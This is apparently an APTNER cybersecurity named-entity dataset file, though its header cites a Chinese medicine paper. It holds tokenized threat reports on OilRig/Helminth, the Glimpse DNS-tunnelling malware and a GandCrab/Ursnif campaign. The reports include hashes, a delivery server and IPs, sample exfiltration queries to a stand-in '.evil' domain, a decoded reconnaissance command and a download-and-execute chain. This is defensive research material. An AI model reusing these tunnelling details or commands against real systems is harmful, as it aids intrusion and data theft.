# Supplementary material for: Enhancing traditional Chinese medical named entity recognition with Dyn-Att Net: a dynamic attention approach
Source: PeerJ Comput Sci. 2024 May 31;10:e2022. doi: 10.7717/peerj-cs.2022 (PMC11636975; doi:10.7717/peerj-cs.2022)
Supplement: Supplemental Information 3 [file peerj-cs-10-2022-s003.zip › APTNER-main/APTNERtrain.txt]

From O
April B-TIME
19-24 I-TIME
, I-TIME
2017 E-TIME
, O
a O
politically-motivated O
, O
targeted O
campaign O
was O
carried O
out O
against O
numerous O
Israeli S-LOC
organizations O
. O

Morphisec B-SECTEAM
researchers E-SECTEAM
began O
investigating O
the O
attacks O
on O
April B-TIME
24 E-TIME
and O
continue O
to O
uncover O
more O
details O
. O

Initial O
reports O
of O
the O
attacks O
, O
published O
April B-TIME
26 E-TIME
( O
in O
Hebrew S-LOC
) O
by O
the O
Israel B-SECTEAM
National I-SECTEAM
Cyber I-SECTEAM
Event I-SECTEAM
Readiness I-SECTEAM
Team E-SECTEAM
( O
CERT-IL S-SECTEAM
) O
and O
The O
Marker S-SECTEAM
, O
confirm O
that O
the O
attack O
was O
delivered O
through O
compromised O
email S-TOOL
accounts O
at O
Ben-Gurion B-IDTY
University E-IDTY
and O
sent O
to O
multiple O
targets O
across O
Israel S-LOC
. O

Ironically O
, O
Ben-Gurion B-IDTY
University E-IDTY
is O
home O
to O
Israel B-SECTEAM
’s I-SECTEAM
Cyber I-SECTEAM
Security I-SECTEAM
Research I-SECTEAM
Center E-SECTEAM
. O

Investigators O
put O
the O
origin O
of O
the O
attack O
as O
Iranian S-LOC
; O
Morphisec S-SECTEAM
’s O
research O
supports O
this O
conclusion O
and O
attributes O
the O
attacks O
to O
the O
same O
infamous O
hacker O
group O
responsible O
for O
the O
OilRig S-MAL
malware O
campaigns O
. O

The O
fileless B-APT
attack E-APT
was O
delivered O
via O
Microsoft B-TOOL
Word E-TOOL
documents O
that O
exploited O
a O
former O
zero-day S-VULNAME
vulnerability O
in O
Word S-TOOL
, O
CVE-2017-0199 S-VULID
, O
to O
install O
a O
fileless O
attack O
variant O
of O
the O
Helminth S-MAL
Trojan S-MAL
agent O
. O

Microsoft S-IDTY
released O
the O
patch O
for O
the O
vulnerability O
on O
April B-TIME
11 E-TIME
, O
but O
many O
organizations O
have O
not O
yet O
deployed O
the O
update O
. O

The O
attackers O
actually O
based O
their O
attack O
on O
an O
existing O
Proof-of-Concept O
method O
that O
was O
published O
by O
researchers O
after O
the O
patch O
release O
. O

By O
hunting O
through O
known O
malware O
repositories O
, O
Morphisec S-SECTEAM
identified O
matching O
samples O
uploaded O
by O
Israeli S-LOC
high-tech O
development O
companies O
, O
medical B-IDTY
organizations E-IDTY
and O
education B-IDTY
organizations E-IDTY
, O
indicating O
that O
they O
were O
victims O
of O
the O
attack O
. O

For O
security O
purposes O
, O
Morphisec S-SECTEAM
is O
not O
revealing O
these O
names O
. O

Upon O
deeper O
investigation O
into O
the O
installed O
Helminth S-MAL
fileless O
agent O
, O
we O
identified O
a O
near O
perfect O
match O
to O
the O
OilRig S-MAL
campaign O
executed O
by O
an O
Iranian S-LOC
hacker O
group O
against O
140 O
financial O
institutions O
in O
the O
Middle B-LOC
East E-LOC
last O
year O
, O
as O
analyzed O
by O
FireEye S-SECTEAM
, O
Palo B-SECTEAM
Alto I-SECTEAM
Networks E-SECTEAM
and O
Logrhythm S-SECTEAM
. O

This O
group O
has O
become O
one O
of O
the O
most O
active O
threat O
actors O
, O
with O
noteworthy O
abilities O
, O
resources O
and O
infrastructure O
; O
speculations O
indicate O
the O
hacking O
organization O
to O
be O
sponsored O
by O
the O
Iranian B-IDTY
government E-IDTY
. O

In O
other O
recent O
attacks O
( O
January B-TIME
2017 E-TIME
) O
, O
the O
group O
used O
a O
fake O
Juniper B-TOOL
Networks I-TOOL
VPN E-TOOL
portal O
and O
fake O
University B-IDTY
of I-IDTY
Oxford E-IDTY
websites O
to O
deliver O
malware O
as O
described O
by O
ClearSky S-SECTEAM
. O

Name O
SHA256 S-ENCR
. O

13.doc S-FILE
: O
a9bbbf5e4797d90d579b2cf6f9d61443dff82ead9d9ffd10f3c31b686ccf81ab S-SHA2
. O

558.doc S-FILE
, O
2.doc: O
2869664d456034a611b90500f0503d7d6a64abf62d9f9dd432a8659fa6659a84 S-SHA2
. O

1.doc S-FILE
: O
832cc791aad6462687e42e40fd9b261f3d2fbe91c5256241264309a5d437e4d8 S-SHA2
. O

3.doc S-FILE
: O
d4eb4035e11da04841087a181c48cd85f75c620a84832375925e6b03973d8e48 S-SHA2
. O

The O
most O
notable O
difference O
from O
last O
year O
’s O
OilRig S-MAL
campaign O
is O
the O
way O
the O
attack O
was O
delivered O
. O

In O
the O
previous O
campaign O
, O
the O
Iranian S-LOC
group O
sent O
specially O
crafted O
Excel S-TOOL
and O
Word S-TOOL
files O
, O
which O
contained O
macros O
that O
targeted O
individuals O
were O
convinced O
to O
enable O
. O

Name O
Delivery O
Server O
. O

test4.hta S-FILE
http://comonscar.in S-URL
( O
82.145.40.46 S-IP
) O
. O

test5.hta S-FILE
80.82.67.42 S-IP
. O

test1.hta S-FILE
reserved O
. O

SHA256: O
5ac61ea5142d53412a251eb77f2961e3334a00c83da9087d355a49618220ac43 S-SHA2
. O

Name O
SHA256 S-ENCR
. O

0011.ps1 S-FILE
042F60714E9347DB422E1A3A471DC0301D205FFBD053A4015D2B509DB92029D1 S-SHA2
. O

1.vbs S-FILE
BE7F1D411CC4160BB221C7181DA4370972B6C867AF110C12850CAD77981976ED S-SHA2
. O

A O
Glimpse O
into O
Glimpse S-APT
For O
the O
second O
blog O
post O
in O
our O
series, O
the O
IronNet B-SECTEAM
Threat I-SECTEAM
Research I-SECTEAM
Team E-SECTEAM
examines O
the O
Glimpse S-MAL
malware O
that O
is O
written O
in O
PowerShell S-TOOL
and O
has O
been O
associated O
with O
OilRig S-APT/APT34 S-APT
. O

Our O
first O
post O
about O
analyzing O
malware O
with O
DNS PROT
tunneling O
capabilities O
focuses O
on O
how O
the O
PoisonFrog S-MAL
malware O
uses O
DNS B-ACT
tunneling E-ACT
to O
send O
and O
receive O
victim O
information O
and O
commands O
. O

Glimpse S-MAL
: O
6e86c57385d26a59c0df1580454b9967 S-MD5
. O

Glimpse S-MAL
is O
a O
PowerShell S-TOOL
script O
that O
is O
executed O
silently O
by O
Visual B-TOOL
Basic E-TOOL
script
. O

Based O
on O
the O
code, O
it O
is O
unclear O
what O
initiates O
the O
Visual B-TOOL
Basic E-TOOL
script O
itself
. O

However, O
a O
variety O
of O
typical O
persistence O
mechanisms, O
such O
as O
a O
scheduled O
task, O
could O
serve O
that O
purpose
. O

After O
Glimpse S-MAL
starts, O
it O
checks O
for O
the O
existence O
of O
a O
directory O
and O
lock O
file
. O

If O
no O
directory O
or O
lock O
file O
is O
found, O
Glimpse S-MAL
creates O
one
. O

Alternatively, O
if O
these O
do O
exist O
and O
the O
lock O
file O
is O
older O
than O
10 O
minutes, O
the O
lock O
file O
is O
deleted O
and O
the O
previously O
running O
Glimpse S-MAL
script O
is O
killed
. O

After O
the O
initial O
checks O
described O
above, O
Glimpse S-MAL
creates O
a O
hidden O
file O
that O
contains O
an O
agent O
ID, O
which O
is O
a O
simple O
concatenation O
of O
a O
random O
number O
10-99 O
and O
the O
first O
8 O
characters O
of O
a O
GUID S-TOOL
without O
dashes
. O

The O
methods O
employed O
by O
Glimpse S-MAL
to O
perform O
DNS PROT
communications O
are O
determined O
by O
the O
mode O
in O
which O
it O
is O
operating O
(i.e., O
text O
mode O
or O
ping O
mode
) O
. O

In O
text O
mode, O
Glimpse S-MAL
manually O
builds B-ACT
a I-ACT
DNS I-ACT
query E-ACT
to O
be O
transmitted O
over O
a O
UDP B-TOOL
socket E-TOOL
. O

In O
ping O
mode, O
Glimpse S-MAL
uses O
a B-FILE
.NET E-FILE
method
. O

The O
table O
below O
describes O
the O
operational O
mode, O
record O
types O
used, O
and O
the O
method O
used O
to O
send O
the O
query
. O

The O
first O
DNS PROT
query O
by O
Glimpse S-MAL
requests O
the O
mode O
to O
be O
used O
in O
future O
communications O
with O
the O
controller O
(i.e., O
ping O
mode O
or O
text O
mode
) O
. O

Prior O
to O
making O
any O
query, O
a O
function O
called O
AdrGen O
is O
used O
to O
build O
a O
query O
string
. O

This O
function O
takes O
several O
parameters, O
most O
of O
which O
are O
represented O
in O
the O
subdomain O
label(s) O
of O
the O
query O
string
. O

Below O
is O
a O
list O
of O
AdrGen O
parameters
. O

As O
mentioned O
above, O
one O
of O
the O
parameters O
passed O
to O
the O
AdrGen O
function O
is O
the O
action O
parameter
. O

Table O
5: O
Glimpse S-MAL
action O
parameters O
values O
for O
the O
AdrGen O
function O
below O
contains O
the O
possible O
parameters, O
a O
brief O
description, O
and O
return O
values O
applicable O
to O
the O
action O
parameter
. O

The O
query O
to O
set O
the O
receive O
mode O
expects O
an O
A O
resource O
record O
response O
from O
the O
controller
. O

The O
controller O
will O
respond O
with O
one O
of O
two O
responses: O
99.250.250.199 S-IP
will O
set O
the O
receive O
mode O
to O
text
. O

Any O
other O
IP O
address O
will O
set O
the O
receive O
mode O
to O
ping, O
although O
the O
server-side O
software O
suggests O
199.250.250.99 S-IP
will O
be O
sent
. O

When O
set O
in O
text O
receive O
mode, O
the O
malware O
uses O
the O
AdrGen O
function O
to O
create O
another O
query O
string O
with O
the O
r O
(receiver) O
flag O
and O
a O
W O
(wait) O
action O
parameter
. O

The O
expected O
TXT O
record O
response O
has O
the O
following O
structure: O
command>data
. O

In O
our O
sample O
traffic, O
the O
TXT O
resource O
record O
returned O
contained: O
S000s>10100
. O

This O
response O
tells O
the O
malware O
to O
set O
a O
variable O
for O
the O
file O
name O
to O
receivebox\rcvd10100 S-FILE
and O
set O
the O
next O
query O
action O
to O
D O
in O
order O
to O
request O
the O
next O
chunk O
of O
data
. O

The O
malware O
sends O
another O
TXT O
query O
with O
the O
receiver O
structure
. O

This O
query O
is O
depicted O
below: O
39e9D60005eca60000BCC64T.sample-domain.evil S-FILE
In O
the O
case O
of O
our O
sample O
traffic, O
the O
server O
responded O
with O
the O
following O
TXT O
resource O
record O
data: O
S0000>d2hvYW1pJmlwY29uZmlnIC9hbGw=
. O

The O
controller O
provided O
the O
malware O
with O
base64-encoded S-ENCR
data O
to O
be O
decoded
. O

The O
data O
will O
eventually O
be O
written O
to O
disk O
and O
the O
malware O
sets O
the O
next O
query O
action O
to O
D O
in O
order O
to O
request O
the O
next O
chunk O
of O
data
. O

The O
decoded O
data O
shows O
a O
command O
to O
be O
executed B-ACT
whoami&ipconfig I-ACT
/all E-ACT
on O
the O
victim O
system
. O

The O
malware O
sends O
another O
TXT O
query O
with O
the O
receiver O
structure, O
as O
depicted O
below
. O

Note O
the O
request O
number O
parameter O
is O
now O
0001: O
39e965e000caD60001679C79T.sample-domain.evil S-FILE
. O

The O
TXT O
record O
returned O
contained O
data: O
E0000>0 O
. O

The O
controller O
issued O
the O
command O
to O
write O
the O
base64-decoded O
and O
modified O
data O
to O
the O
file O
name O
set O
earlier O
in O
the O
exchange O
. O

After O
the O
file O
is O
written, O
the O
malware O
moves O
on O
to O
process O
operations O
. O

Glimpse S-MAL
can O
be O
set O
to O
use O
ping O
mode O
in O
several O
ways O
while O
performing O
receive O
operations O
. O

If O
a O
query O
with O
the O
M O
action O
returns O
an O
IP O
address O
that O
is O
not O
99.250.250.199 S-IP
, O
the O
malware O
will O
use O
ping O
mode O
. O

It O
is O
worth O
noting O
that O
the O
IP O
response O
observed O
to O
set O
ping O
mode O
was O
the O
reverse O
of O
the O
IP O
used O
to O
set O
text O
mode O
(i.e., O
199.250.250.99 S-IP
) O
. O

Ping O
mode O
will O
also O
be O
set O
if O
exceptions O
occur O
more O
than O
three O
times O
during O
text O
mode
. O

In O
the O
latter O
case, O
the O
P O
action O
is O
passed O
as O
one O
of O
the O
parameters O
to O
AdrGen O
and O
the O
query O
is O
made O
for O
an O
A O
resource O
record O
using O
the O
[System.Net.Dns]::GetHostAddresses O
method
. O

If O
performing O
receive O
operations O
in O
ping O
mode, O
Glimpse S-MAL
makes O
a O
query O
with O
the O
0 O
action O
to O
contact O
the O
controller O
for O
tasking
. O

This O
query O
uses O
a O
receive O
structure O
similar O
to O
an O
M O
action; O
it O
is O
worth O
noting O
all O
of O
the O
receiver O
operation O
queries O
made O
in O
ping O
mode O
use O
the O
[System.Net.Dns]::GetHostAddresses O
method
. O

In O
our O
sample, O
after O
the O
malware O
sent O
the O
0 O
action, O
the O
controller O
responded O
with O
an O
A O
record O
containing O
24.125.10.140 S-IP
. O

This O
response O
tells O
the O
malware O
to: O
Set O
the O
file O
name O
for O
the O
data O
that O
will O
follow O
to O
10140, O
Set O
the O
part O
number O
to O
0, O
Parse O
response O
data, O
Set O
a O
1 O
action O
for O
the O
next O
query
. O

Query: O
00039e9650eca66C06T.sample-domain.evil S-FILE
, O
Response: O
24.125.10.140 S-IP
, O
File O
name: O
10140, O
Query: O
139e965e000ca6D2C80T.sample-domain.evil S-FILE
, O
Response: O
110.101.116.0 S-IP
, O
Query: O
00339e965e1ca6EF4C07T.sample-domain.evil S-FILE
, O
Response: O
32.117.115.3 S-IP
, O
Query: O
30069e O
1965eca6FE8C13T.sample-domain.evil, O
Response: O
101.114.32.6 S-IP
, O
Query: O
391 B-FILE
e960095eca63570BC62T.sample-domain.evil E-FILE
, O
Response: O
1.2.3.0 S-IP
. O

In O
this O
case, O
the O
content O
net O
user O
is O
written O
to O
rcvd10140
. O

After O
writing O
the O
data O
to O
disk, O
receiver O
operations O
are O
complete O
and O
processor O
operations O
begin
. O

After O
writing O
the O
data O
received O
from O
the O
controller, O
a O
function O
is O
called O
to O
process O
the O
received O
file
. O

The O
processor O
function O
builds O
a O
list O
of O
files O
from O
the O
files O
with O
content O
that O
match O
rcvd* O
in O
the O
receivebox O
directory
. O

Similar O
to O
PoisonFrog S-MAL
, O
the O
last O
digit O
of O
the O
received O
file O
name O
determines O
how O
the O
content O
of O
the O
file O
is O
processed
. O

In O
our O
sample O
traffic, O
after O
executing O
the O
commands O
sent O
via O
cmd.exe S-FILE
, O
Glimpse S-MAL
writes O
the O
output O
of O
the O
commands O
in O
the O
sendbox O
directory O
to O
the O
appropriate O
file O
names O
(e.g., O
10100 O
or O
10140) O
prepended O
with O
proc O
(e.g., O
proc10100
) O
. O

Once O
written, O
the O
send O
operations O
begin
. O

Similar O
to O
text O
mode O
receiver, O
after O
AdrGen S-MAL
builds O
the O
string, O
a O
function O
to O
manually O
build O
and O
send O
the O
DNS PROT
query O
packet O
is O
called
. O

The O
text O
mode O
sender O
uses O
the O
same O
hardcoded O
transaction O
ID O
0xa4a3; O
however, O
instead O
of O
sending O
queries O
for O
TXT O
resource O
records, O
the O
malware O
uses O
A O
resource O
records
. O

As O
with O
the O
text O
mode O
receiver, O
the O
query O
is O
made O
with O
a O
direct O
connection O
to O
the O
controller O
IP O
address O
as O
opposed O
to O
allowing O
the O
query O
to O
propagate O
the O
native O
DNS PROT
architecture
. O

If O
the O
send O
function O
is O
being O
invoked O
in O
ping O
mode, O
the O
process O
described O
above O
is O
followed; O
however, O
instead O
of O
manually O
building O
and O
transmitting O
the O
DNS PROT
query, O
the O
[System.Net.Dns]::GetHostAddresses O
method O
is O
used
. O

With O
that O
method, O
the O
malware’s O
query O
will O
traverse O
the O
native O
DNS PROT
architecture O
as O
opposed O
to O
the O
victim O
making O
a O
direct O
connection O
to O
the O
controller
. O

The O
send O
function O
uses O
several O
counters O
to O
maintain O
various O
pieces O
of O
information O
used O
to O
control O
the O
flow O
of O
execution
. O

An O
exception O
counter O
is O
used O
to O
track O
the O
number O
of O
exceptions O
and O
will O
exit O
the O
send O
loop O
if O
a O
threshold O
is O
hit
. O

The O
send O
counter O
is O
used O
to O
track O
the O
number O
of O
chunks O
sent O
to O
the O
controller
. O

An O
additional O
counter O
exists O
to O
handle O
cases O
where O
the O
file O
being O
sent O
is O
larger O
than O
250 O
chunks
. O

The O
send O
counter O
is O
initialized O
to O
0 O
and O
read O
from O
the O
fourth O
octet O
of O
the O
A O
record O
returned O
by O
the O
controller
. O

The O
send O
counter O
is O
also O
passed O
to O
the O
AdrGen S-MAL
function O
as O
the O
part O
number O
parameter O
and O
is O
visible O
in O
the O
query O
string O
as O
depicted O
below: O
Query: O
239e965ec000a60000B6C90T.COCTab33333233332222222222222222210100A3280AAAAAAAAAAAAAAAAA.33333210100A.sample-domain.evil S-FILE
, O
Response: O
39.2.3.1 S-IP
, O
Query: O
230019e965eca60000A16DC20T.EBB466767667256666772556776662FBFD932F3F64079E4F730B65239FE0.33333210100A.sample-domain.evil S-FILE
, O
Response: O
39.2.3.2 S-IP
, O
Query: O
392e002965eca60000C6D18C42T.33232333332333500262233332466710E0E18362E239DDA839020190D932.33333210100A.sample-domain.evil S-FILE
. O

When O
the O
send O
loop O
has O
fewer O
than O
60 O
bytes O
to O
send O
(e.g., O
a O
small O
file O
or O
the O
last O
part O
of O
a O
file), O
the O
send O
function O
transmits O
the O
remaining O
bytes O
with O
a O
shorter O
data O
section
. O

When O
there O
are O
no O
more O
bytes O
to O
send, O
a O
hardcoded O
file O
end O
marker O
COCTabCOCT O
is O
sent O
in O
the O
data O
section O
and O
the O
send O
loop O
will O
be O
exited
. O

The O
controller O
responds O
with O
the O
253.25.42.87 S-IP
A O
record O
response
. O

Query: O
239055e965eca60000CC30T.66654667676673003300C93CC92212953EDACEDA.33333210100A.sample-domain.evil S-FILE
, O
Response: O
39.2.3.56 S-IP
, O
Query: O
05639e9652eca6000057C06T.COCTabCOCT33333210100A.sample-domain.evil S-FILE
, O
Response: O
253.25.42.87 S-IP
. O

Once O
an O
A O
record O
response O
is O
received O
by O
the O
malware O
containing O
253.25.42.87 S-IP
, O
several O
variables O
are O
set O
in O
preparation O
to O
exit O
the O
send O
operation
. O

After O
the O
send O
operation O
is O
complete, O
the O
lock O
file O
for O
the O
current O
run O
is O
deleted O
and O
the O
script O
exits
. O

Many O
of O
the O
capabilities O
discovered O
in O
Glimpse S-MAL
were O
also O
present O
in O
the O
malware O
analyzed O
in O
part O
one O
of O
this O
series
. O

Glimpse S-MAL
added O
the O
ability O
to O
use O
an O
alternate O
DNS PROT
resource O
record O
type O
(TXT) O
as O
opposed O
to O
solely O
relying O
on O
A O
resource O
records O
for O
DNS PROT
queries
. O

Using O
TXT O
resource O
records O
enabled O
the O
actors O
to O
provide O
tasking O
in O
fewer O
transactions O
due O
to O
the O
amount O
of O
data O
that O
can O
be O
transmitted O
in O
a O
TXT O
response
. O

To O
support O
this O
capability, O
the O
adversaries O
chose O
to O
manually O
craft O
the O
DNS PROT
queries O
and O
communicate O
directly O
with O
the O
controller O
as O
opposed O
to O
using O
existing O
.NET S-FILE
DNS PROT
libraries
. O

The O
differences O
between O
PoisonFrog S-MAL
and O
Glimpse S-MAL
highlight O
the O
ease O
at O
which O
adversaries O
can O
modify O
their O
tools O
to O
meet O
their O
end O
objectives
. O

With O
regard O
to O
detection, O
several O
methods O
can O
be O
used O
to O
identify O
this O
type O
of O
C2 S-TOOL
activity
. O

Performing O
entropy O
calculations O
on O
subdomain O
labels O
can O
help O
highlight O
the O
amount O
of O
randomness O
in O
a O
label, O
but O
this O
is O
just O
one O
of O
many O
possible O
data O
analysis O
points, O
since O
a O
standalone O
feature O
may O
not O
be O
enough O
to O
determine O
whether O
traffic O
is O
malicious
. O

The O
IronDefense O
Network O
Traffic O
Analysis O
platform O
combines O
several O
behavioral O
detection O
methods O
alongside O
historical O
network O
information O
to O
detect O
the O
C2 S-TOOL
techniques O
used O
by O
Glimpse S-MAL
and O
other O
malware
. O


Carbon B-SECTEAM
Black I-SECTEAM
TAU I-SECTEAM
ThreatSight E-SECTEAM
Analysis O
GandCrab S-MAL
and O
Ursnif S-MAL
Campaign
. O

The O
Carbon B-SECTEAM
Black I-SECTEAM
ThreatSight E-SECTEAM
team O
observed O
an O
interesting O
campaign O
over O
the O
last O
month O
. O

ThreatSight S-SECTEAM
worked O
with O
the O
Threat B-IDTY
Analysis I-IDTY
Unit E-IDTY
( O
TAU S-IDTY
) O
to O
research O
the O
campaign O
. O

This O
report O
is O
being O
released O
to O
help O
researchers O
and O
security O
practitioners O
combat O
this O
campaign O
as O
new O
samples O
are O
being O
discovered O
in O
the O
wild O
daily O
. O

This O
attack O
, O
if O
successful O
, O
can O
infect O
a O
compromised O
system O
with O
both O
Ursnif S-MAL
malware O
and O
GandCrab S-MAL
ransomware O
. O

The O
overall O
attack O
leverages O
several O
different O
approaches O
, O
which O
are O
popular O
techniques O
amongst O
red O
teamers O
, O
espionage O
focused O
adversaries O
, O
and O
large O
scale O
criminal O
campaigns O
. O

This O
campaign O
originally O
came O
in O
via O
phishing B-ACT
emails E-ACT
that O
contained O
an O
attached O
Word B-TOOL
document E-TOOL
with O
embedded O
macros O
, O
Carbon B-SECTEAM
Black E-SECTEAM
located O
roughly O
180 O
variants O
in O
the O
wild O
. O

The O
macro O
would O
call O
an O
encoded O
PowerShell S-TOOL
script O
and O
then O
use O
a O
series O
of O
techniques O
to O
download O
and O
execute O
both O
a O
Ursnif S-MAL
and O
GandCrab S-MAL
variant O
. O

This O
campaign O
has O
been O
discussed O
at O
a O
high O
level O
by O
other O
researchers O
publicly O
. O

Carbon B-SECTEAM
Black E-SECTEAM
product O
specific O
content O
can O
be O
located O
in O
the O
User B-TOOL
Exchange E-TOOL
. O

In O
this O
campaign O
the O
attackers O
used O
a O
MS B-TOOL
Word E-TOOL
document O
( O
.doc S-FILE
format O
) O
to O
deliver O
the O
initial O
stages O
. O

It O
should O
be O
noted O
that O
out O
of O
the O
roughly O
180 O
Word S-TOOL
variants O
that O
were O
located O
by O
Carbon B-SECTEAM
Black E-SECTEAM
, O
the O
biggest O
difference O
in O
the O
documents O
was O
the O
metadata O
and O
junk O
data O
located O
in O
the O
malicious O
macros O
. O

However O
the O
metadata O
clearly O
showed O
that O
the O
documents O
prepared O
for O
this O
campaign O
were O
initially O
saved O
on O
December B-TIME
17 I-TIME
, I-TIME
2018 E-TIME
and O
have O
continued O
to O
be O
updated O
through O
January B-TIME
21 I-TIME
, I-TIME
2019 E-TIME
. O

Several O
metadata O
fields O
( O
specifically O
title O
, O
subject O
, O
author O
, O
comments O
, O
manager O
, O
and O
company O
) O
appear O
to O
have O
been O
populated O
with O
different O
data O
sets O
. O

For O
example O
the O
subject O
in O
all O
the O
samples O
was O
a O
combination O
of O
a O
US S-LOC
state O
and O
a O
common O
first O
name O
( O
like O
Utah S-LOC
Erick O
or O
Tennessee S-LOC
Dayna O
) O
. O

For O
this O
post O
the O
following O
sample O
was O
analyzed O
. O

Richard_Johnson.doc S-FILE
: O
878e4e8677e68aba918d930f2cc67fbe S-MD5
0a3f915dd071e862046949885043b3ba61100b946cbc0d84ef7c44d77a50f080 S-SHA2
. O

The O
document O
contained O
a O
VBS B-TOOL
macro E-TOOL
that O
once O
decompressed O
was O
approximately O
650 O
lines O
of O
code O
. O

The O
vast O
majority O
of O
that O
was O
junk O
code O
. O

Once O
the O
junk O
code O
was O
removed O
from O
the O
VBScript S-TOOL
, O
there O
are O
approximately O
18 O
lines O
of O
relevant O
code O
, O
which O
ultimately O
call O
a O
shape O
box O
in O
the O
current O
document O
. O

The O
variable O
names O
themselves O
are O
not O
relevant O
, O
however O
the O
methods O
in O
bold O
below O
will O
retrieve O
the O
AlternativeText S-TOOL
field O
from O
the O
specified O
shape O
, O
which O
is O
then O
executed O
. O

The O
alternate O
text O
can O
easily O
be O
observed O
in O
the O
body O
of O
the O
office O
document O
. O

The O
area O
highlighted O
in O
blue O
is O
the O
shape O
name O
that O
is O
being O
located O
, O
while O
the O
text O
itself O
is O
highlighted O
in O
red O
. O

It O
is O
clear O
that O
the O
text O
is O
a O
base64 S-ENCR
encoded O
command O
, O
that O
is O
then O
executed O
by O
the O
above O
VBScript S-TOOL
. O

The O
PowerShell S-TOOL
script O
will O
first O
create O
an O
instance O
of O
the O
.Net S-FILE
Webclient O
class O
and O
then O
enumerate O
the O
available O
methods O
using O
the O
GetMethods() S-TOOL
call O
( O
highlighted O
in O
the O
image O
in O
red O
) O
. O

The O
enumerated O
methods O
are O
stored O
, O
then O
a O
for O
loop O
looks O
first O
for O
the O
method O
named O
DownloadString S-TOOL
( O
highlighted O
in O
blue O
) O
. O

If O
the O
DownloadString S-TOOL
method O
is O
located O
it O
will O
contact O
the O
hard O
coded O
C2 S-TOOL
requesting O
a O
file O
, O
which O
is O
downloaded O
and O
then O
invoked O
( O
highlighted O
in O
blue O
) O
. O

It O
should O
be O
noted O
that O
because O
the O
requested O
resource O
is O
being O
stored O
as O
a O
string O
and O
executed O
, O
this O
all O
occurs O
in O
memory O
. O

Additional O
Analysis O
of O
the O
downloaded O
string O
is O
provided O
in O
the O
Gandcrab S-MAL
cradle O
section O
below O
. O

The O
loop O
then O
looks O
for O
the O
method O
name O
DownloadData S-TOOL
, O
and O
if O
located O
will O
download O
a O
resource O
from O
a O
second O
C2 S-TOOL
. O

This O
request O
is O
then O
stored O
in O
the O
CommonApplicationData O
directory O
( O
C:\ProgramData O
in O
Vista O
and O
later O
) O
as O
the O
hard O
coded O
file O
name O
( O
highlighted O
in O
green O
) O
. O

The O
script O
will O
utilize O
the O
hard O
coded O
DCOM S-TOOL
object O
C08AFD90-F2A1-11D1-8455-00A0C91F3880 O
, O
which O
is O
the O
ClassID O
for O
the O
ShellBrowserWindow S-TOOL
. O

A O
previous O
blog O
post O
by O
enigma0x3 O
, O
detailed O
how O
this O
CLSID O
can O
be O
leveraged O
to O
instantiate O
the O
ShellBrowserWindow S-TOOL
object O
and O
call O
the O
ShellExecute S-TOOL
method O
, O
which O
is O
the O
same O
approach O
that O
was O
taken O
by O
the O
attackers O
. O

This O
approach O
has O
also O
been O
used O
in O
different O
Empire S-TOOL
modules O
. O

The O
payloads O
that O
are O
downloaded O
in O
the O
above O
steps O
are O
then O
executed O
on O
the O
system O
. O

The O
first O
payload O
that O
is O
downloaded O
via O
the O
DownloadString S-TOOL
method O
highlighted O
above O
, O
is O
a O
PowerShell S-TOOL
one-liner O
that O
uses O
an O
IF O
statement O
to O
evaluate O
the O
architecture O
of O
the O
compromised O
system O
, O
and O
then O
downloads O
a O
additional O
payload O
from O
pastebin.com S-DOM
. O

This O
additional O
payload O
is O
then O
executed O
in O
memory O
. O

The O
image O
below O
depicts O
the O
contents O
of O
the O
o402ek2m.php S-FILE
file O
. O

It O
should O
be O
noted O
that O
the O
contents O
of O
o402ek2m.php S-FILE
were O
updated O
by O
the O
attackers O
to O
reference O
different O
pastebin O
uploads O
throughout O
this O
campaign O
. O

Also O
updated O
was O
the O
function O
name O
that O
is O
invoked O
, O
in O
the O
example O
below O
it O
was O
CJOJFNUWNQKRTLLTMCVDCKFGG O
, O
however O
this O
was O
dynamically O
changed O
to O
match O
the O
name O
of O
the O
function O
that O
would O
be O
present O
in O
pastebin O
file O
that O
was O
being O
downloaded O
. O

Once O
the O
raw O
contents O
of O
the O
pastebin.com S-DOM
post O
were O
downloaded O
, O
that O
data O
would O
also O
be O
executed O
in O
memory O
. O

In O
the O
variants O
that O
were O
obtained O
during O
this O
campaign O
the O
file O
contained O
a O
PowerShell S-TOOL
script O
that O
was O
approximately O
2800 O
lines O
. O

This O
PowerShell S-TOOL
script O
is O
a O
version O
of O
the O
Empire B-TOOL
Invoke-PSInject E-TOOL
module O
, O
with O
very O
few O
modifications O
. O

The O
majority O
if O
the O
modifications O
are O
of O
removing O
comments O
and O
renaming O
variables O
. O

The O
script O
will O
take O
an O
embedded O
PE S-TOOL
file O
that O
has O
been O
base64 S-ENCR
encoded O
and O
inject O
that O
into O
the O
current O
PowerShell S-TOOL
process O
. O

The O
image O
below O
is O
the O
main O
function O
that O
is O
being O
called O
which O
in O
turns O
calls O
the O
function O
responsible O
for O
injecting O
the O
embedded B-TOOL
PE I-TOOL
file E-TOOL
. O

The O
base64 S-ENCR
encoded O
PE S-TOOL
file O
that O
can O
be O
seen O
in O
line O
2760 O
of O
the O
image O
above O
is O
a O
GandCrab S-MAL
Variant O
. O

This O
variant O
( O
the O
metadata O
for O
which O
is O
listed O
below O
) O
is O
Gandcrab S-MAL
version O
5.0.4
. O

krab5.dll S-FILE
: O
0f270db9ab9361e20058b8c6129bf30e S-MD5
d6c53d9341dda1252ada3861898840be4d669abae2b983ab9bf5259b84de7525 S-SHA2
, O
Mon B-TIME
Oct I-TIME
29 I-TIME
17:39:23 I-TIME
2018 E-TIME
UTC O
. O
krab5.text S-FILE
: O
019bc7edf8c2896754fdbdbc2ddae4ec S-MD5
. O
krab5.rdata S-FILE
: O
d6ed79624f7af19ba90f51379b7f31e4 S-MD5
. O
krab5.data S-FILE
: O
1ec7b57b01d0c46b628a991555fc90f0 S-MD5
. O
krab5.rsrc S-FILE
: O
89b7e19270b2a5563c301b84b28e423f S-MD5
. O
krab5.reloc S-FILE
: O
685c3c775f65bffceccc1598ff7c2e59 S-MD5
. O

The O
second O
payload O
, O
downloaded O
via O
the O
DownloadData S-TOOL
method O
, O
is O
a O
Ursnif S-MAL
executable O
. O

In O
this O
instance O
it O
is O
saved O
to O
the O
C:\ProgramData O
directory O
with O
a O
pseudo O
random O
name O
. O

It O
should O
be O
noted O
that O
the O
file O
name O
was O
changed O
throughout O
this O
campaign O
. O

Once O
executed O
the O
Ursnif S-MAL
sample O
will O
conduct O
the O
typical O
actions O
observed O
in O
Ursnif S-MAL
samples O
, O
like O
credential O
harvesting O
, O
gathering O
system O
and O
process O
information O
, O
and O
deploying O
additional O
malware O
samples O
. O

The O
information O
for O
this O
specific O
sample O
is O
listed O
below O
. O

However O
, O
numerous O
Ursnif S-MAL
variants O
were O
hosted O
on O
the O
